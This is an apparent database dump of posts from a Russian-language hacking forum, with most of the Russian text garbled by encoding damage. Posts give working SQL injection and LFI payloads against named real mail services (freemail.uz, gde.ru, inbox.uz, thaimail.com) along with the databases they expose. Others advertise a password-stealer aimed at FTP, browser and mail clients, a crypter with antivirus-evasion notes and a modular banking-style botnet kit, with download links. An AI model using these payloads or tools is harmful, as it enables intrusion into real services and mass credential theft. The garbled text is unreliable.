üóýþòõýýðѠôõшøфрþòúð ÑÂþхрðýõýýых ÿðрþûõù ôÃȄʄÂûõôующøх ÿрþóрðüü:\r\n* FAR Manager\r\n* Total Commander\r\n* WS_FTP\r\n* CuteFTP\r\n* FlashFXP\r\n* FileZilla\r\n* FTP Commander\r\n* BulletProof FTP\r\n* SmartFTP\r\n* TurboFTP\r\n* FFFTP\r\n* CoffeeCup FTP\r\n* CoreFTP\r\n* FTP Explorer\r\n* Frigate3 FTP\r\n* SecureFX\r\n* UltraFXP\r\n* FTPRush\r\n* WebSitePublisher\r\n* BitKinex\r\n* ExpanDrive\r\n* ClassicFTP\r\n* Fling\r\n* SoftX\r\n* Directory Opus\r\n* FreeFTP\r\n* DirectFTP (þÿрõôõÃȄÂõтÑÂѠúðú FreeFTP)\r\n* LeapFTP\r\n* WinSCP\r\n* 32bit FTP\r\n* NetDrive\r\n* WebDrive\r\n* FTP Control\r\n* Opera\r\n* WiseFTP\r\n* FTP Voyager\r\n* Firefox\r\n* FireFTP\r\n* SeaMonkey\r\n* Flock\r\n* Mozilla Suite Browser\r\n* LeechFTP\r\n* Odin Secure FTP Expert\r\n* WinFTP\r\n* FTP Surfer\r\n* FTPGetter\r\n* ALFTP\r\n* Internet Explorer\r\n* Dreamweaver\r\n* DeluxeFTP\r\n* Google Chrome\r\n* Chromium\r\n* SRWare Iron (þÿрõôõÃȄÂõтÑÂѠúðú Chromium)\r\n* ChromePlus\r\n* Bromium (Yandex Chrome)\r\n* Nichrome\r\n* Comodo Dragon\r\n* RockMelt\r\n* K-Meleon\r\n* Epic\r\n* Staff-FTP\r\n* AceFTP\r\n* Global Downloader\r\n* FreshFTP\r\n* BlazeFTP\r\n* NETFile\r\n* GoFTP\r\n* 3D-FTP\r\n* Easy FTP\r\n* Xftp\r\n* FTP Now\r\n* Robo-FTP\r\n* LinasFTP\r\n* Cyberduck\r\n* Putty\r\n* Notepad++ (NppFTP)\r\n* CoffeeCup Visual Site Designer\r\n* CoffeeCup Sitemapper (þÿрõôõÃȄÂõтÑÂѠúðú CoffeeCup FTP)\r\n* FTPShell\r\n* FTPInfo\r\n* NexusFile\r\n* FastStone Browser\r\n* CoolNovo\r\n* WinZip\r\n* Yandex.Internet\r\n* MyFTP\r\n* sherrod FTP\r\n* NovaFTP\r\n* Windows Mail\r\n* Windows Live Mail\r\n* Pocomail\r\n* Becky!\r\n* IncrediMail\r\n* The Bat!\r\n* Outlook\r\n* Thunderbird\r\n* FastTrackFTP\r\n\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!9VMAjRwT!KBRoTCxsnZV6qC2_TjLFNC1C2Mmgr0gZ0r3NeSNLlHk', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(1095, 1071, 0, 'skiffha', 10, 'Krypton', 1403528284, '[QUOTE]\r\n----------------------------------------\r\nâðü 3 ÿрþõúтð: •ýðчðûьýыù þñрðñþтчøú + üþрфõр + ÑÂðü ÑÂтðñ\r\n•óõýõрðтþр üуÑÂþрð\r\n•üþрфõр øúþýþú\r\n\r\nKrypton_7.1_1\r\nFile Size: 59.21MB\r\n\r\nKrypton_7.1_2\r\nFile Size: 10.55MB\r\n\r\nKrypton_7.1_3\r\nFile Size: 10.54MB\r\nñþûõõ ÑÂтðñøûьýðѠòõрÑÂøѠ(ýðüýþóþ üõýьшõ ñøтых фðùûþò) + ÿрõôуÿрõöôðõт, õÑÂûø фðùû ñьõтÑÂÑ - òыÑÂúþчøт ÿрõôуÿрõöôõýøõ, чтþ ýðôþ рõúрøÿтþýуть\r\n\r\n----------------------------------------\r\n\r\nNOD - ÑÂøóýðтуры/øüÿþрт, + úþûøчõÑÂтòþ фуýúцøù ø øх ÿþрÑÂôþú, уñрðть ntdll.dll ø÷ øüÿþртð, ôðýýыõ\r\nAvast - ÑÂøóýðтуры ò ôðýýых\r\nVBA - ÑÂüуÃȄÂцøÑÂ, ÿþÑÂтðòøû ôûøýýыù цøúû\r\nGData - øüÿþрт, руóðõтÑÂѠýð üуûьтøüõôøð, ÿþÑÂтðòøть þÿтøüø÷ðцøø\r\nPanda - öõûðтõûьýþ ÿрøÑÂутÑÂтòøõ user32.dll\r\nAvira - öõûðтõûьýþ úþôþòуñю ÑÂõúцøю ÿþÑÂтðòøть ýð ÷ðÿøÑÂÑŒ, ôþñðòøть ôõñðó ôøрõúтþрøю !!!base64 ÑÂôõûðть\r\nPanda - ÑÂøóýðтуры/ÃÂÃÂâà Þߨï\r\nKAV - рð÷рõöøть úþô фõùúþòыüø DBGPRINT + øüÿþрт(øýþóôð)\r\nMSE - тþ öõ чтþ KAV\r\nBitDefender - ÿрøúþÿðÃȄÂѠú GetProcAddress (ntdll & kernel); ßþñþûьшõ øüÿþртð ûõòþóþ.\r\n\r\n----áþфт ôûѠрðñþты ѠøÑÂхþôýøúðüø.----\r\n\r\nVisual Studio 2010 Ultimate Rus\r\n[url]http://rutracker.ru/viewtopic.php?p=108645[/url] øûø\r\n[url]http://rutracker.org/forum/viewtopic.php?t=3400202[/url]\r\n[url]http://www.torrentino.com/torrents/242497[/url] - Eng òõрÑÂøÑÂ\r\n\r\nVisual Assist X 10.7 - ÑÂтðòøть ÿþÑÂûõ уÑÂтðýþòúø ÑÂтуôøø\r\n[url]http://rutracker.org/forum/viewtopic.php?t=3991420[/url]\r\n\r\n----------------------------------------\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!lQ0TAQhB!A8_djrfAKImLV8EqMQQSKKfpjYW_tWE8zV-l-_D74XA', 1, 0, '141.101.98.120', 0, 1, 0, 0, 0),
(1094, 1070, 0, 'Psych0tr1a', 11, 'freemail.uz SQLi', 1403528255, 'url:\r\n[code]http://freemail.uz/pass.php[/code]\r\n\r\npost data:\r\n[code]otvet=%CF%EE%EB%F3%F7%E8%F2%FC+%EF%E0%F0%EE%EB%FC&run=1&main_vop=&main_svop=qwe&main_otvet=qwe&login=qwerty\' [/code]\r\nMySQL Blind Time Based inj\r\n\r\nãÑÂ÷òüыù ÿðрðüõтр: login\r\n\r\nData Bases: \r\ninformasiom_schema\r\nfreemail_horde\r\nmysql\r\ntest', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1093, 1064, 1092, 'null', 9, '', 1403527943, '[QUOTE=Psych0tr1a;1092]ãöõ üþöýþ ÑÂþ÷ôðòðть þтôõûьýыù тþÿøú Ñ ÑÂúуÃȄÂüø ýð ebay :)[/QUOTE]\r\n\r\nÃÂтþ ÑÂúуûѠò ÑÂþфтõ у _http://www.emarsys.com/ru/', 1, 0, '141.101.64.53', 0, 1, 0, 0, 0),
(1092, 1064, 1076, 'Psych0tr1a', 11, '', 1403527837, 'ãöõ üþöýþ ÑÂþ÷ôðòðть þтôõûьýыù тþÿøú Ñ ÑÂúуÃȄÂüø ýð ebay :)', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1091, 1069, 0, 'Psych0tr1a', 11, 'Gde.ru SQLi', 1403527726, 'url:\r\n[code]http://mail.gde.ru/lostpwd.php[/code]\r\n\r\npost data:\r\n[code]password=qweasdrty&c_password=qweasdrty&changepwd=%D1%EC%E5%ED%E8%F2%FC+%EF%E0%F0%EE%EB%FC&username=qwerty&question=1&sq_answer=qwerty\' and (ExtractValue(1,concat(0x3a,(user())))) -- [/code]\r\n\r\nà õ÷уûьтðт: mysql error: XPATH syntax error: \':mail@localhost\'\r\n\r\n\r\nÕщё ñыûð ÑÂúуûѠòþт тут:\r\n[code]http://www.gde.ru/service/mail_rss/subscribe?step1[category]=11\'[/code]\r\nÃÂþ ñþûьшõ ÑÂтþóþ фðùûð ýõ ÑÂущõÑÂтòуõт.', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1090, 1064, 1089, 'null', 9, '', 1403527603, '[quote=w0rm;1089]ýþòþÑÂтø þт ÷ðúð÷чøúð\r\n[code]\r\n(18:44:28) -------: Ѡÿþýøüðю \r\n(18:44:32) -------: ýþ üýõ ýðôþ ñô\r\n(18:44:43) -------: ÑÂðùтð ð ýõ тþûьúþ тðñûøцð ю÷õрþò Ñ ÑÂтþù ñô\r\n[/code][/quote]\r\n\r\nûþüðть ðôüøýúу ø ÑÂûøòðть ñô', 1, 0, '141.101.64.53', 0, 1, 0, 0, 0),
(1089, 1064, 1088, 'w0rm', 1, '', 1403527544, 'ýþòþÑÂтø þт ÷ðúð÷чøúð\r\n[code]\r\n(18:44:28) -------: Ѡÿþýøüðю \r\n(18:44:32) -------: ýþ üýõ ýðôþ ñô\r\n(18:44:43) -------: ÑÂðùтð ð ýõ тþûьúþ тðñûøцð ю÷õрþò Ñ ÑÂтþù ñô\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1087, 1068, 0, 'Psych0tr1a', 11, 'Inbox.uz SQLi + src disclosure + mini bug', 1403527275, '[B]SQLi[/B]\n\nurl:\n[code]http://inbox.uz/restore.php?Submit=%C4%E0%EB%FC%F8%E5+-%3E&username=qwerty[/code]\nMySQL Blind Time Based inj\nãÑÂ÷òøüыù ÿðрðüõтр: username\n\nData Bases: \ninformation_schema\nmail\nmdata\n\n[B]Source code disclosure:[/B]\n[code]http://inbox.uz/restore[/code]\n\n[B]áüõýð ÿðрþûѠþт ûюñþù ÿþчты:[/B]\n1) òыñøрðõü ûþóøý ø ýðчøýðõü ÿрþхþôøть ÿрþцõôуру òþÑÂÑÂтðýþòûõýøѠÿðрþÃȄÂ. ÞÑÂтðýðòûøòðõüÑÂѠýð òòþôõ þтòõтð ýð òþÿрþÑÂ.\n2) ãýøòõрÑÂðûьýыù þтòõт ýð òþÿрþÑÂ:\n[code]\' or \'x\'=\'x[/code]', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1088, 1064, 1076, 'null', 9, '', 1403527335, '[quote=w0rm;1085]_ttp://link.ebay.com/u/gm.php?uid=9wfuwxw5b7&id=147094560_775085_779\r\n\r\navailable databases [1]:\r\n[*] emarsys_int[/quote]\r\n\r\nу ýøх þôýð þñûðчýðѠñð÷ð))', 1, 0, '141.101.98.70', 0, 1, 0, 0, 0),
(1099, 1073, 0, 'skiffha', 10, 'K.i.n.s 1.0.2.0', 1403533967, '[QUOTE]\r\nitur1, url2, url3 - урûы ýð óõùт ôрþÿÿõрð (õхõ фðùû). \r\n\r\n\r\nßþüøüþ þÑÂýþòýþóþ урûð øüõõтÑÂѠôòð ÷ðÿðÑÂýых ýð тþт ÑÂûучðù, õÑÂûø Òðш ôþüõý ûþúýут.\r\nØüõýýþ ÑÂтþт фðùû ÑÂûõôуõт ÿрþóруöðть. Õóþ ýõþñхþôøüþ Úà ØßâÞÒÃÂâì.\r\n\r\ndelay - òрõüѠ÷ðôõрöúø þтÑÂтуúð\r\n\r\nretry - øýтõрòðû òрõüõýø ÷ðñþрð ÑÂôрð ñþтð.\r\n\r\nbuildid - øüѠñþтýõтð ôрþÿÿõрð.\r\n\r\nencryption_key - úûюч шøфрþòðýøÑÂ.\r\n\r\nurl_server - óõùт ðôüøýúø \"Ñ\", Ñ‚.õ. ðôüøýúø ÑÂôрð.\r\n\r\n$ - ýþтøфðù.\r\n! - ÷ðÿрõт.\r\n@ - ÑÂúрøýшþты (ÿþûýþрð÷üõрýыõ).\r\n\r\nÜðúрþÑÂÑ‹:\r\n%BOTID% - ID ñþтð.\r\n%opensocks% - ðòтþüðтøчõÑÂúþõ þтúрытøõ ÑÂþúÑÂð ÿрø ÿõрõхþôõ ýð àãà Û.\r\n\r\ncaptcha_server - ÿõрõхòðт úðÿчø. à ðñþтðõт òüõÑÂтõ Ñ ÃÂ×. ÞÑÂтðòÃȄÂõü úðú õÑÂть.\r\n\r\nßþÑÂûõ ÑÂñþрð úþýфøóð òыôðõтÑÂѠòыôðõтÑÂÑ 3 фðùûы - dropper.exe , bot32.dll , bot64.dll ø тðú öõ у ÒðѠýðхþôøтÑÂѠфðùû softwaregrabber.dll,\r\núþтþрыù уöõ ÑÂþñрðý ýõ÷ðòøÑÂøüþ þт ÿõрòых трõх.\r\n\r\ndropper.exe - фðùû ôрþÿÿõрð (50 úñ), úþтþрыù утÑÂóøòðõт ÑÂôрð ñþтð (2 ÑÂôрð, bot32.dll ø bot64.dll). Ãâ€Ã°Ã½Ã½Ñ‹Ã¹ фðùû ýõþñхþôøüþ Úà ØßâÞÒÃÂâì.\r\n\r\nbot32.dll - ÑÂôрþ ôûѠ32 ñøтýых ÑÂøÑÂтõü.....\r\n:> úрøÿтþòðть ÃÂÕ ýðôþ. ÃÂòтþúрøÿт ò ÿðüÑÂтø. Üþôуûø ÑÂòÃȄÂÑŽÑ‚ÑÂѠþÑÂýþòþù ñþтð ø þтòõчðют ÷ð ÿрþцõÑÂÑÂÑ‹ øýöõúтøрþòðýøѠø óрðññøýóð Ѡñрþу÷õрþò.\r\nbot64.dll - ÑÂôрþ ôûѠ64 ñøтýых ÑÂøÑÂтõü.....\r\n\r\nsoftwaregrabber.dll - üþôуûь þтúрытøѠÿþртþò. Þтòõчðõт ÷ð óрðññøýó FTP \\ Email \\ pop3 \\ Billing \\ screen ø ÿрþòõрúу þтÑÂтуúð üþôуûõù ÑÂôрð. Úрøÿтþòðть ÃÂÕ ýðôþ. ÃÂòтþúрøÿт ò ÿðüÑÂтø.\r\n\r\n\r\nïôрþ ñþтð. ßà ÃÂÒØÛÞ áÒï×ÃËœ ÃËœ ×ÃÂÓà ã×ÃÅ¡ÃËœ. ÞáÞÑÕÃÂÃÂÞ ÞÑà ÃÂâØâì Ã’ÃÂÃËœÃÅ“ÃÂÃÂØÕ.\r\n\r\n- Ãâ€Ã¾Ã±Ã°Ã²Ã»ÃµÃ½Ã¸Ãµ фðùûð ò \"фðùûы\". Ã’ ÷ðôðýøѠôþñðòÃȄÂÑŽÑ‚ÑÂѠфðùûы bot32.dll , bot64.dll , softwaregrabber.dll ø ôруóøõ üþôуûø, ò тþü чøÑÂûõ ø ÑÂтþрþýýøõ ôûû øûø õхõ фðùûы.\r\nØüѠø òõрÑÂøю òыñøрðõтõ ÿþ öõûðýøю. Ñþт ÿþôôõрöøòðõт ÑÂòÑÂ÷ь ѠüþôуÃȄÂüø Zutick , Shylock, SpyEye , ýþ ñõ÷ þтúрытþóþ API (ÿрøþñрõтðõтÑÂѠþтôõûьýþ) ðрóуüõýт þÑÂтðòÃȄÂõü empty.\r\nÒýøüðýøõ! áòÑÂ÷ь ѠüþôуÃȄÂüø. áýðчðûð ÷ðóруöðõü üþôуûø ÑÂôрð. ßрø ÑÂтþü üþôуûø ÑÂôрð ýõ ôþûöýы ñыть ýø Ѡчõü ÑÂòÑÂ÷ðýы. Ãâ€Ã°Ã»ÃµÃµ ÷ðóруöðõü üþôуûь softwaregrabber.dll, \r\núþтþрыù ôþûöõý ñыть ÑÂòÑÂ÷ðý Ñ bot32.dll\r\n\r\n- Ãâ€Ã°ÃµÃ¼ ÷ðôðýøõ ôûѠüþôуûõù ò рð÷ôõûõ \"÷ðôðýøÑÂ\". áûõôуõт þтüõтøть úûючõòыõ üþüõýты: ð) Ãâ€Ã»Ñ Ã¼Ã¾Ã´ÑƒÃ»ÃµÃ¹ ÑÂôрð òыñøрðõü рõöøü ÷ðóру÷úø \"üýþóþрð÷þòþ\", \r\nôûѠüþôуûѠsoftwaregrabber - \"þôýþрð÷þòþ\" øûø \"üýþóþрð÷þòþ\". ñ) ÚþûøчõÑÂтòþ òыÿþûýõýøù (òыÿþûýõýøÑÂ) ÑÂтðòøü ñþûьшþõ чøÑÂûþ, ú ÿрøüõру 9999999.\r\n\r\n- ×ðôðýøѠ\"÷ðÿøÑÂðть ò úþýфøó\", \"òòþô úþüðýôы òручýую\" ôþÑÂтуÿýы тþûьúþ ÿрø þтúрытþü API. ×ðôðýøõ \"þтÿрðòøть ûþóø\" ôþÑÂтуÿýþ тþûьúþ ôûѠôõñðó-òõрÑÂøø,\r\núþтþрðѠôõûðõтÑÂѠÿþ ÿрõôòðрøтõûьýþüу ÷ðÿрþÑÂу ø ò úрðùýøх ÑÂûучðÑÂÑ…. Ã’ ôðýýþü ÑÂûучðõ ûþóø þñ уÑÂтðýþòúõ ôрþÿÿõрð ø ÿþûучõýøø ÿрðò øôут ò рð÷ôõû \"ûþóø\".\r\n\r\n- çøÑÂтыõ \\ óрÑÂ÷ýыõ - ýõþñхþôøüыù ðтрøñут, õÑÂûø рõшøтõ ÑÂóру÷øть ñþтþò ò þôýø руúø.\r\n\r\n- Þñýþòûõýøõ dll øôõт ÿþ ÑÂхõüõ i+1 Ñ ÑÂþхрðýõýøõü øüõýø ñþтð ò фðùûðх ø ÷ðôðýøÑÂÑ…, õÑÂûø ýõþñхþôøüþ þñýþòûõýøõ ò ÿþрÑÂôúõ þчõрõôø , ø ÿþ ÑÂхõüõ i , õÑÂûø þñýþòûõýøõ \r\nøôõт ÿþÑÂûõ рõñутð.\r\n\r\n- Ãâ€Ã»Ñ Ã¾Ã±Ã½Ã¾Ã²Ã»ÃµÃ½Ã¸Ñ ÑÂтðтøÑÂтøúø ò ðôüøýúõ ôрþÿÿõрð ýõ ÷ðñыòðõü ôþñðòÃȄÂть ÷ðôðýøõ ò Úà ÞÃÂ.\r\n\r\n- à ð÷ýøцð üõöôу ðôüøýúðüø \"ÃÂ\" ø \"Ñ\" ÿþúð÷ыòðõт úðчõÑÂтòþ Òðшõóþ трðффøúð. ïôрð ñþтð þтÑÂтуúøòðют тþûьúþ ÿþÑÂûõ ÿþûучõýøѠûþóþò. Ã’ ÑÂûучðõ, õÑÂûø \r\nÑÂôрþ ÿрþóруöðõтÑÂ, ÑÂúðöõü, ýð ôõôøú, óôõ ýõт ýøúðúþù ðúтøòýþÑÂтø, ñþт ñуôõт ÿþúð÷ыòðтьÑÂѠò ðôüøýúõ \"Ñ\" , ýþ ýõ ÿþúð÷ыòðтьÑÂѠò ðôüøýúõ \"ÃÂ\".\r\nÃ’Ñ‹ òÑÂõóôð üþöõтõ ÿþÑÂüþтрõть úþûøчõÑÂтòþ ÷ðóруöõýýых ÑÂôõр ñþтð ò рð÷ôõûõ \"÷ðôðýøÑÂ\" ò ðôüøýúõ ôрþÿÿõрð. à ð÷ýøцð ýð ÿûþхþü трðфõ üþöõт ôþÑÂтøóðть ø 90% , \r\nüы ûøшь ÿþúð÷ыòðõü þñъõúтøòýыù рðÑÂúûðô òõщõù.\r\n(17:55:08) Üþôуûь mod-killer ÿрõôýð÷ýðчõý ôûѠÿþôôõрöðýøѠÒðшøх ñþтþò ò чøÑÂтþтõ þт ÑÂтþрþýýøх ñþтþò, ýõöõûðтõûьýþóþ ßÞ.\r\n- ãôðûõýøõ Citadel(all), Zeus (all) , SpyEye (all) , IceIX (all) , Evolution (all) ø øх ÿрþø÷òþôýых, Carberp (øÑÂúûючõýøõ - ñутúøт), \r\nZutick, Lickat , Shylock, Gazavat (Sality). \r\n- ãôðûõýøõ ÑÂтþрþýýõóþ òрõôþýþÑÂýþóþ ßÞ, тðúþóþ úðú ûþðôõры, à ÃÂâы, Ãâ€Ãâ€ÃžÃ¡-ñþты, ýð þÑÂýþòðýøø ÑÂòрøÑÂтøчõÑÂúþóþ ðýðûø÷ð. \r\n- ãôðûõýøõ ýõöõûðтõûьýþóþ ÑÂþфтð, тðúþóþ úðú úûøú-ñþты, ñþты ÿþôüõýы òыôðчø, ýð þÑÂýþòðýøø ÑÂòрøÑÂтøчõÑÂúþóþ ðýðûø÷ð.\r\n- ãôðûõýøõ рðÑÂÿрþÑÂтрðýõýýых ñþтþò ôðöõ ò úрøÿтþòðýýþü òøôõ ýð þÑÂýþòðýøø ÑÂøóýðтур.\r\n- ÞñщðѠøýтõóрðцøѠѠýõùрþýýþù ÑÂõтью ñþтð. ÃÂýðûø÷ ýõÿþôÿøÑÂðýýþóþ ÑÂþфтð, ÿрþцõÑÂÑÂþò ñõ÷ þúþý ø Ñ‚.ô.\r\n\r\n\r\nßðрðüõтры уÑÂтðýþòúø:\r\n×ðôðõü ðрóуüõýты (ðрóуüõýты SpyEye ò ðôüøýúõ ÑÂôрð)\r\n\"77_uninstall;\" - уôðûõýøõ ýõöõûðтõûьýþóþ ßÞ, тðúþóþ úðú ñþт-úûøúõры ø Ñ‚.ô.\r\n\"77_replace_with=http://aa.ru/file.exe\" (õÑÂûø у ÒðѠõÑÂть ßÞ ôûѠÿрþóру÷ð, ýþ úþýúурõýты óру÷ÑÂÑ‚ ðýðûþóøчýþõ ßÞ ÿþ Òðшøü ñþтðü) úðчðõтÑÂѠýþòыù ñþт ÿþ ãà Û Ѡøüуýýøтõтþü ú ôõûøтõру - 77_uninstall\r\n\"report;\" - ñðóрõÿþрт ò ðôüøýúу ÑÂôрð.\r\n\"clean_zeus_based;\" - уôðûõýøѠòÑÂõх òõрÑÂøù рðÑÂÿрþÑÂтрðýõýýых ñþтþò ýð þÑÂýþòõ ÑÂøóýðтур.\r\nßþôôõрöøòðõтÑÂѠ÷ðÿøÑÂÑŒ ò ÑÂтрþчúу ýõÑÂúþûьúøх ðрóуüõýтþò. Úðöôыù ðрóуüõýт ôþûöõý ÷ðúðýчøòðтьÑÂÑ \";\".\r\n×ðóруöðõтõ üþôуûь ò фðùûы, ôþñðòÃȄÂõтõ ò ÷ðôðýøÑÂÑ…, ÑÂòÑÂ÷ðò Ñ ÑÂôрþü bot32.dll\r\n\r\nÃâ€Ã»Ñ Ñ‚þóþ , чтþñы øÑÂÿþûь÷þòðть üþôуûь ÑÂþúÑÂþò , ýõþñхþôøüþ ÑÂôõûðть ÑÂôõûующõõ:\r\n1) ÃÂðùтø ÑÂõрòõр, öõûðтõûьýþ Windows (üþöýþ ôõôøú, ѠуÑÂтðýþòûõýýыü apache/nginx/xamp/denwer, ò þñщõü ýуöõý ÑÂõрòõр\r\nѠуÑÂтðýþòûõýýыü php). ÃÂð ýøúÑÂðх ÿþô òðùýþü тþöõ ôþûöõý рðñþтðть.\r\n2) ×ðûøòðõü ÿðÿúу socks_server ýð ÑÂõрòõр, ÑÂтðòøü ýð òÑÂõ 777 ÿрðòð.\r\n3) Ñõрõü ûøýú ú фðùûу gate.php ýð ÑÂõрòõрõ , ÷ðÿþüøýðõü.\r\n4) ×ðхþôøü ò ðôüøýúу ôрþÿÿõрð, ôþñðòÃȄÂõü üþôуûø socks5Server32.dll ø socks5Server64.dll, ò ðрóуüõýтðх уúð÷ыòðõü ûøýú ø÷ ÿуýúтð 3).\r\nÚуôð øýöõúтøть - explorer.exe.\r\n5) áþúÑÂÑ‹ ò òøôõ IP:Port ñõрõü ò ÷ðхþôѠýð ûøýú \"òðш_ÑÂõрòõр\"/control.php , ûøñþ ø÷ log.txt\r\nØýþóôð чøÑÂтøü úþýýõúшýы úûøúðõü ò Kill Tasks. Üþôуûь ÿþôôõрöøòðõт ÿрþтþúþû ÑÂþúÑÂþò 4-þù ø 5þù òõрÑÂøø ÿþ ÑÂтðýôðрту rfc.\r\nÃÂòтþрø÷ðцøѠýõ трõñуõтÑÂÑÂ. ÒþûýþòðтÑÂѠýðÑÂчõт ÿþртþò ôûѠñþтþò ýõ ýуöýþ, þýø ÑÂðüø ñуôут ñрðть ø÷ óõùтð.\r\nÃ’ÃÂÃËœÃÅ“ÃÂÃÂØÕ! Üþôуûь ôþûöõý ñыть ÑÂòÑÂ÷ðý Ñ ÑÂôрþü bot32.dll ôûѠsocks5Server32.dll ø Ñ bot64.dll c socks5Server64.dll ÑÂþþтòõтÑÂтòõýýþ.\r\nÒýøüðýøõ! Ã’ ÷ðôðýøÑÂü ø фðùûðх øüõýð ôþûöýы ñыть øüõýýþ socks5Server32.dll ø socks5Server64.dll\r\nÃÂòтþþтúрытøõ ÑÂþúÑÂþò þÑÂущõÑÂтòÃȄÂõтÑÂѠÿþ üðúрþÑÂу //%opensocks% ò øýöõúтð.\r\n\r\nÜþôуûь softwaregrabber ÿрõôýð÷ýðчõý ôûѠóрðññøýóð äâß , õ-üõùû , ÿþÿ3 ôðýýых ø ÑÂõртøфøúðтþò.\r\nÜþôуûь øüõõт øýтõóрðцøю Ѡþñщõù ýõùрþýýþù ÑÂõтью ñþтð ø ÑÂòÃȄÂõтÑÂѠñð÷þòыü üþôуûõü ÿþ þтýþшõýøю ú ÑÂôру.\r\n\r\nßðрðüõтры уÑÂтðýþòúø:\r\n×ðôðõü ðрóуüõýты (ðрóуüõýты SpyEye ò ðôüøýúõ ÑÂôрð)\r\n\"grab_all;\" - Óрðñøт òÑÂõ - òÑÂõ äâß ôðýýыõ, чтþ ÷ðÿøÑÂðýы цõûыü ÑÂÿøÑÂþúþü, òÑÂõ email-i + úþýтðúты ò учõтúðх,\r\núуúø IE ø FF (ÿþÑÂûõ þтÿрðòúø ò ðôüøýúу ÿþ òþ÷üþöýþÑÂтø уôðÃȄÂÑŽÑ‚ÑÂÑÂ), ø ÑÂõртøфøúðты MY store (ÑÂúÑÂÿþртøрþòðýýыõ ò ðôüøýúу ÑÂõртøфøúðты \r\nÿþô ÿðрþûõü \"GCert\")\r\n\"grab_emails;\" - óрðññøýó тþûьúþ õüõùûþò.\r\n\"grab_ftps;\" - óрðññøýó тþûьúþ äâß.\r\n\"grab_certs;\" - óрðññøýó тþûьúþ ÑÂõртøфøúðтþò.\r\n\"grab_sol;\" - óрðññøýó ÑÂþû-úуúþò.\r\nßþôôõрöøòðõтÑÂѠ÷ðÿøÑÂÑŒ ò ÑÂтрþчúу ýõÑÂúþûьúøх ðрóуüõýтþò. Úðöôыù ðрóуüõýт ôþûöõý ÷ðúðýчøòðтьÑÂÑ \";\".\r\n×ðóруöðõтõ üþôуûь ò фðùûы, ôþñðòÃȄÂõтõ ò ÷ðôðýøÑÂÑ…, ÑÂòÑÂ÷ðò Ñ ÑÂôрþü bot32.dll\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!oNlmzY4B!_kLJr7kHTjmaR2_WhUSqPLXCWU3VB9B50-dgrj-Gm_I', 1, 0, '141.101.104.15', 0, 1, 0, 0, 0),
(1086, 1067, 0, 'Psych0tr1a', 11, 'Thaimail.com LFI + [2]SQLi', 1403526888, '[B]SQL injection[/B]\r\n[code]http://g4.thaimail.com/new/market/sub_category.php?cateID=999999999.9+union+select+1,2,user(),4,5,6,7,8+--+[/code]\r\n\r\nuser()=root@localhost\r\nFile_Priv=Y\r\n\r\nÃÂþ ÑÂãÚàMAGIC QUOTES = ON\r\n\r\nÃ’ ñð÷õ ñþûьшõ 5000000 ю÷õрþò.\r\nßðрþûø ò þтúрытþü òøôõ.\r\n\r\n\r\n[B]LFI[/B]\r\nurl:\r\n[code]http://g4.thaimail.com/index-top.php?auth_error=-4&backto=[/code]\r\n\r\nheaders:\r\n[code]\r\nHost: g4.thaimail.com\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nConnection: close\r\nCookie: CGateProWebUser=xd6GxdzQFgwbtBuaLkRe; PHPSESSID=nvmqhg7o4glsltq1g16u53dl27; theme=../../../../../../usr/local/www/data/js/ajax.js%00; lang=th_TH; cookie_test_1=test; cookie_test_2=test[/code]\r\n\r\nÞтúрыòðõтÑÂÑ ÑÂþôõрöøüþõ ø÷ ÑÂтþóþ фðùûð\r\n[url]http://g4.thaimail.com/js/ajax.js[/url]\r\n\r\n[B]à ðÑÂúрытøõ ÿутõù ýð g4.*[/B]\r\n[code]\r\nhttp://g4.thaimail.com/apps/ab/\r\n\r\nFile /usr/local/www/data/inc/inc.php, line 175\r\n=\r\nhttp://g4.thaimail.com/inc/inc.php[/code]\r\n\r\nßðÿúø úþтþрыõ уôðûþÑÂÑ‚ þтыÑÂúðть ýð ÑÂõрòõрõ g4.*\r\n[code]\r\nhttp://g4.thaimail.com/apps/\r\nhttp://g4.thaimail.com/apps/ab/\r\nhttp://g4.thaimail.com/apps/admin/\r\nhttp://g4.thaimail.com/apps/mail/\r\nhttp://g4.thaimail.com/commart/\r\nhttp://g4.thaimail.com/conf/\r\nhttp://g4.thaimail.com/content/\r\nhttp://g4.thaimail.com/content/images/\r\nhttp://g4.thaimail.com/content/img/\r\nhttp://g4.thaimail.com/docs/\r\nhttp://g4.thaimail.com/images/\r\nhttp://g4.thaimail.com/img/\r\nhttp://g4.thaimail.com/inc/\r\nhttp://g4.thaimail.com/js/\r\nhttp://g4.thaimail.com/js/src\r\nhttp://g4.thaimail.com/lib/\r\nhttp://g4.thaimail.com/lib/acl/\r\nhttp://g4.thaimail.com/lib/auth/\r\nhttp://g4.thaimail.com/lib/html/\r\nhttp://g4.thaimail.com/lib/html/widget/\r\nhttp://g4.thaimail.com/lib/log/\r\nhttp://g4.thaimail.com/lib/mime/\r\nhttp://g4.thaimail.com/lib/mime/renderer/\r\nhttp://g4.thaimail.com/lib/prefs/\r\nhttp://g4.thaimail.com/lib/session/\r\nhttp://g4.thaimail.com/lib/vfs/\r\nhttp://g4.thaimail.com/new/\r\nhttp://g4.thaimail.com/new/market/\r\nhttp://g4.thaimail.com/new/member/\r\nhttp://g4.thaimail.com/plugins/\r\nhttp://g4.thaimail.com/scripts/\r\nhttp://g4.thaimail.com/style/\r\nhttp://g4.thaimail.com/templates/\r\nhttp://g4.thaimail.com/themes/\r\nhttp://g4.thaimail.com/utils/[/code]\r\n\r\n[B]SQL injection (Mysql Boolean Based Blind) + à ðÑÂúрытøõ ÿутõù[/B]\r\n\r\n[code]http://www.thaimail.com/chkuser.php?uid=qwerty\'[/code]\r\n\r\nàâãâ ãÖÕ MAGIC QUOTES = OFF 